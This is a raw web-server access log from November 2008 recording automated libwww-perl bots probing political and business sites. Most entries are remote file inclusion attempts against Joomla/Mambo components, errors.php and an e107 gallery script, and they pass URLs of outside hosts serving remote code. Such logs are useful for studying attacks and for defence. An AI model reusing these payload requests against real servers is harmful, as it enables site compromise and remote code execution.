74.52.107.130 - - [19/Nov/2008:05:47:29 -0800] "GET /?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.814" "nyassemblygop.org"
74.52.107.130 - - [19/Nov/2008:05:47:30 -0800] "GET /logs//?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.814" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:41 -0800] "GET /logs/access.log//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:41 -0800] "GET /logs/access.log/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:41 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:41 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:41 -0800] "GET /logs//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:41 -0800] "GET /logs/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:42 -0800] "GET /logs/access.log/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:42 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:42 -0800] "GET /logs/access.log//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:42 -0800] "GET /logs/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:42 -0800] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "nyassemblygop.org"
66.244.236.243 - - [19/Nov/2008:05:47:42 -0800] "GET /logs//?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.805" "nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:48:09 -0800] "GET /errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:48:09 -0800] "GET /logs/errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:05:48:09 -0800] "GET /logs/access_081021.log/errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:05:50:07 -0800] "GET /logs/e107_plugins/my_gallery/dload.php?file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
74.7.219.93 - - [19/Nov/2008:05:50:07 -0800] "GET /logs/access.log/e107_plugins/my_gallery/dload.php?file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
74.7.219.93 - - [19/Nov/2008:05:50:07 -0800] "GET /e107_plugins/my_gallery/dload.php?file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
74.7.219.93 - - [19/Nov/2008:05:51:36 -0800] "GET /logs/access_080927.log/e107_plugins/my_gallery/dload.php?file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:05:51:36 -0800] "GET /logs/e107_plugins/my_gallery/dload.php?file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:05:53:46 -0800] "GET /logs/e107_plugins/my_gallery/dload.php?file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:05:53:46 -0800] "GET /e107_plugins/my_gallery/dload.php?file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
69.89.31.108 - - [19/Nov/2008:05:54:35 -0800] "GET /logs/access.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cannabiswork.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "nyassemblygop.org"
69.89.31.108 - - [19/Nov/2008:05:54:35 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cannabiswork.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "nyassemblygop.org"
69.89.31.108 - - [19/Nov/2008:05:54:35 -0800] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cannabiswork.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "nyassemblygop.org"
89.111.176.11 - - [19/Nov/2008:05:55:21 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com